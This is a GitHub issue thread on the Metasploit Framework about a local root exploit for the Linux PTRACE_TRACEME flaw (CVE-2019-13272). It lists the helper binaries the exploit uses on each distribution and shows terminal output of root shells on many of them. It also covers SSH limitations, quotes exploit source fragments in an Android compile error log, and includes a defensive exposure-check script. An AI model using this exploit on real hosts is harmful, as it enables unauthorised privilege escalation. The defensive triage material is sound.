rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME (CVE-2019-13272) #12104

Closed bcoles closed 4 years ago

bcoles commented 5 years ago

Debian

Debian 10 (xfce)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@debian-10-0-0-x64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
root@debian-10-0-0-x64:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(user)
root@debian-10-0-0-x64:/home/user/Desktop/47133# 

Debian 9.4 (xfce)

/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper

user@debian9-4-0-x64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
root@debian9-4-0-x64:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(lpadmin),117(scanner),1000(user)

Devuan 2.0.0 (xfce)

/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper

user@devuan-2-0-0:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
root@devuan-2-0-0:/home/user/Desktop/47133#

SparkyLinux 5 (lxqt)

/usr/bin/lxqt-backlight_backend

user@sparkylinux-5-x64:~/47133$ ./a.out 
executing passwd
attached to midpid
root@sparkylinux-5-x64:/home/user/47133# id
uid=0(root) gid=0(root) groups=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),104(scanner),107(lpadmin),113(netdev),114(bluetooth),1000(user)
root@sparkylinux-5-x64:/home/user/47133#

Ubuntu

Ubuntu 16.04.5 (unity)

/usr/lib/unity-settings-daemon/usd-backlight-helper

user@ubuntu-16-04-5-x64:~/Desktop/kernel-exploits/CVE-2019-13272$ ./a.out 
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/lib/unity-settings-daemon/usd-backlight-helper
[~] Using helper: /usr/lib/unity-settings-daemon/usd-backlight-helper
[.] Spawning suid process (/usr/bin/pkexec) ...
[.] Tracing midpid ...
[~] Attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu-16-04-5-x64:/home/user/Desktop/kernel-exploits/CVE-2019-13272# 

Ubuntu 18.04 (gnome)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@ubuntu:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu:/home/user/Desktop/47133# 

Ubuntu 19.04 (gnome)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@ubuntu-19-04-x64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu-19-04-x64:/home/user/Desktop/47133# 

Ubuntu Mate 19.04 (mate)

/usr/sbin/mate-power-backlight-helper

user@ubuntu-mate-19-04-desktop-amd64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu-mate-19-04-desktop-amd64:/home/user/Desktop/47133# 

Linux Mint 19-v2 (mate)

/usr/sbin/mate-power-backlight-helper

user@linux-mint-19-2:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@linux-mint-19-2:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),128(sambashare),1000(user)
root@linux-mint-19-2:/home/user/Desktop/47133# 

Elementary OS 0.4.1 (gnome)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@elementary-os-0-4-1-20170517:~/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@elementary-os-0-4-1-20170517:/home/user/47133# exit

Fedora / CentOS / RHEL

Fedora 30 Workstation (gnome)

/usr/libexec/gsd-wacom-led-helper /usr/libexec/gsd-wacom-oled-helper

[user@localhost CVE-2019-13272]$ ./a.out 
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/libexec/gsd-wacom-led-helper
[.] Spawning pkexec ...
[.] Tracing midpid ...
[~] Attached to midpid
[root@localhost CVE-2019-13272]# id
uid=0(root) gid=0(root) groups=0(root),10(wheel),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Arch

Manjaro 18.0.3 (xfce)

/usr/bin/xfpm-power-backlight-helper

[user@manjaro-xfce-18-0-3-x86-64 47133]$ ./a.out 
executing passwd
attached to midpid
[manjaro-xfce-18-0-3-x86-64 47133]# 

Mageia 6 (gnome)

/usr/libexec/gsd-backlight-helper

[user@localhost 47133]$ ./a.out 
executing passwd
attached to midpid
[root@localhost 47133]#

Antergos 18.7 (gnome)

Antergos was recently EOL (last release 2019-04-04)

/usr/lib/gsd-wacom-oled-helper /usr/lib/gsd-backlight-helper

[user@antergos 47133]$ ./a.out 
executing passwd
attached to midpid
[root@antergos 47133]# id
uid=0(root) gid=0(root) groups=0(root),985(users),998(wheel)
[root@antergos 47133]# exit
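The banner above gives the affected upstream range (Linux 4.10 up to but not including 5.1.17) and the per-distribution list of polkit-launched helper binaries. A defender triaging hosts wants both facts as a check rather than as a wall of terminal output. The following script is an added example, not part of this issue or of the Metasploit module it tracks: it parses a `uname -r` style release string into the upstream version, tests it against that range, and reports which of the helper paths quoted in this thread exist on the host. The function names, the regular expression, and the injectable `exists` callback (so the helper check can run against a constructed file list offline) are assumptions of this example. A version match is only a hint: distributions and stable branches backport fixes, so confirm against the vendor advisory before treating a host as exposed.

```python
"""Exposure pre-check for CVE-2019-13272 (added example; not the issue's or
Metasploit's own code). Two questions a defender asks before reading the
vendor advisory: does the running kernel's upstream version fall inside the
range quoted in the exploit banner, and which of the helper binaries listed
in this thread are installed (they indicate which desktop stack is present
and therefore which hosts to patch first)."""
import os
import re
from typing import Callable, Iterable, List, Tuple

# Affected range as printed by the exploit banner: 4.10 <= version < 5.1.17.
VULN_MIN = (4, 10, 0)   # inclusive
FIXED_AT = (5, 1, 17)   # exclusive; 5.1.17 carries the fix

# Helper paths quoted in this thread (constructed list, copied from the reports above).
KNOWN_HELPERS = [
    "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
    "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
    "/usr/bin/lxqt-backlight_backend",
    "/usr/lib/unity-settings-daemon/usd-backlight-helper",
    "/usr/sbin/mate-power-backlight-helper",
    "/usr/libexec/gsd-wacom-led-helper",
    "/usr/libexec/gsd-wacom-oled-helper",
    "/usr/bin/xfpm-power-backlight-helper",
    "/usr/libexec/gsd-backlight-helper",
    "/usr/lib/gsd-wacom-oled-helper",
    "/usr/lib/gsd-backlight-helper",
]

# Leading "major.minor[.patch]"; distro suffixes like "-54-generic" or
# ".fc30.x86_64" are ignored on purpose.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def parse_kernel_release(release: str) -> Tuple[int, int, int]:
    """Return the upstream (major, minor, patch) triple from a uname -r string."""
    m = _VERSION_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def kernel_in_affected_range(release: str) -> bool:
    """True when the upstream version lies in [4.10, 5.1.17).

    Hint only: stable branches and distro kernels backport fixes, so an
    in-range version must still be checked against the vendor advisory."""
    return VULN_MIN <= parse_kernel_release(release) < FIXED_AT


def present_helpers(candidates: Iterable[str],
                    exists: Callable[[str], bool] = os.path.exists) -> List[str]:
    """Return the candidate helper paths that exist on the host.

    `exists` is injectable so the check can be exercised offline against a
    constructed set of paths instead of the real filesystem."""
    return [path for path in candidates if exists(path)]


def assess(release: str,
           exists: Callable[[str], bool] = os.path.exists) -> dict:
    """Combine both checks into a single report for one host."""
    return {
        "release": release,
        "kernel_in_affected_range": kernel_in_affected_range(release),
        "helpers_present": present_helpers(KNOWN_HELPERS, exists),
    }


if __name__ == "__main__":
    # Live run on the current host.
    print(assess(os.uname().release))
```

Run it directly to assess the local host, or call `assess()` from inventory tooling with a release string collected elsewhere. A host that is in range and has one of the helpers installed goes to the front of the patch queue; the fix is a kernel update, since the defect is in the kernel's PTRACE_TRACEME handling rather than in the helpers themselves.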

timwr commented 5 years ago

Is there some way we can look up the helper dynamically? Or is it ok just to list them so we have one for every vulnerable distro? I tried this briefly and unsuccessfully on Ubuntu 18.04

bcoles commented 5 years ago

Is there some way we can look up the helper dynamically? Or is it ok just to list them so we have one for every vulnerable distro? I tried this briefly and unsuccessfully on Ubuntu 18.04

Yes, I'll implement automatic targeting.

Auxilus commented 5 years ago

I downloaded the PoC without modifications and it reboots my device (Android Pie). Any idea if Android is vulnerable and, if not, why?

timwr commented 5 years ago

FYI it works for me on Ubuntu 18.04 as a logged-in user, but not over SSH:

ssh user@vulnerable
user@ubuntu:~$ ./a.out
executing passwd
Error executing command as another user: Not authorized

This incident has been reported.

(I'm already logged in as the same user)

bcoles commented 5 years ago

FYI it works for me on Ubuntu 18.04 as a logged-in user, but not over SSH:

Correct. Console lock is not sufficient for pkexec. Need an active pkexec session.

bcoles commented 5 years ago

Updated C exploit here:

rodneymullen2 commented 5 years ago

Anyone who was able to make it work over SSH? PoC?

haqpl commented 5 years ago

Are there any other binaries which meet the requirements, like pkexec helpers which do not require an active pkexec session, to make it work via SSH?

MlgmXyysd commented 5 years ago

Updated C exploit here:

Cannot compile on aarch64

timwr commented 5 years ago

What's the error? What's the OS?

MlgmXyysd commented 5 years ago

What's the error? What's the OS?

CVE-2019-13272.c:181:24: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
    execl(pkexec_path, basename(pkexec_path), NULL);
                       ^
CVE-2019-13272.c:181:24: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
    execl(pkexec_path, basename(pkexec_path), NULL);
                       ^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:104:43: note: passing argument to parameter '__arg0' here
int execl(const char* __path, const char* __arg0, ...) __attribute__((__sentinel__));
                                          ^
CVE-2019-13272.c:198:22: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
  execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
                     ^
CVE-2019-13272.c:198:22: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
  execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
                     ^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:104:43: note: passing argument to parameter '__arg0' here
int execl(const char* __path, const char* __arg0, ...) __attribute__((__sentinel__));
                                          ^
CVE-2019-13272.c:215:38: error: no member named 'rsp' in 'struct user_regs_struct'; did you mean 'sp'?
  unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
                                     ^~~
                                     sp
/data/data/com.termux/files/usr/include/sys/user.h:242:12: note: 'sp' declared here
  uint64_t sp;
           ^
CVE-2019-13272.c:233:8: error: no member named 'orig_rax' in 'struct user_regs_struct'
  regs.orig_rax = __NR_execveat;
  ~~~~ ^
CVE-2019-13272.c:234:8: error: no member named 'rdi' in 'struct user_regs_struct'
  regs.rdi = exec_fd;
  ~~~~ ^
CVE-2019-13272.c:235:8: error: no member named 'rsi' in 'struct user_regs_struct'
  regs.rsi = scratch_area + offsetof(struct injected_page, path);
  ~~~~ ^
CVE-2019-13272.c:236:8: error: no member named 'rdx' in 'struct user_regs_struct'
  regs.rdx = scratch_area + offsetof(struct injected_page, argv);
  ~~~~ ^
CVE-2019-13272.c:237:8: error: no member named 'r10' in 'struct user_regs_struct'
  regs.r10 = scratch_area + offsetof(struct injected_page, envv);
  ~~~~ ^
CVE-2019-13272.c:238:8: error: no member named 'r8' in 'struct user_regs_struct'
  regs.r8 = AT_EMPTY_PATH;
  ~~~~ ^
CVE-2019-13272.c:258:17: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
  execlp(SHELL, basename(SHELL), NULL);
                ^
CVE-2019-13272.c:258:17: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
  execlp(SHELL, basename(SHELL), NULL);
                ^~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:105:44: note: passing argument to parameter '__arg0' here
int execlp(const char* __file, const char* __arg0, ...) __attribute__((__sentinel__));
                                           ^
CVE-2019-13272.c:406:6: warning: implicit declaration of function 'strchrnul' is invalid in C99 [-Wimplicit-function-declaration]
    *strchrnul(buf, '\n') = '\0';
     ^
CVE-2019-13272.c:406:5: error: indirection requires pointer operand ('int' invalid)
    *strchrnul(buf, '\n') = '\0';
    ^~~~~~~~~~~~~~~~~~~~~
CVE-2019-13272.c:407:22: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
    if (strncmp(buf, basename(helper_path), 15) == 0)
                     ^
CVE-2019-13272.c:407:22: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
    if (strncmp(buf, basename(helper_path), 15) == 0)
                     ^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/string.h:137:44: note: passing argument to parameter '__rhs' here
int strncmp(const char* __lhs, const char* __rhs, size_t __n) __attribute_pure__;
                                           ^
9 warnings and 8 errors generated.

MlgmXyysd commented 5 years ago

What's the error? What's the OS?

Android Pie with Linux kernel 4.9.106, using Termux terminal environment. gcc: clang-8

timwr commented 5 years ago

This exploit doesn't work on Android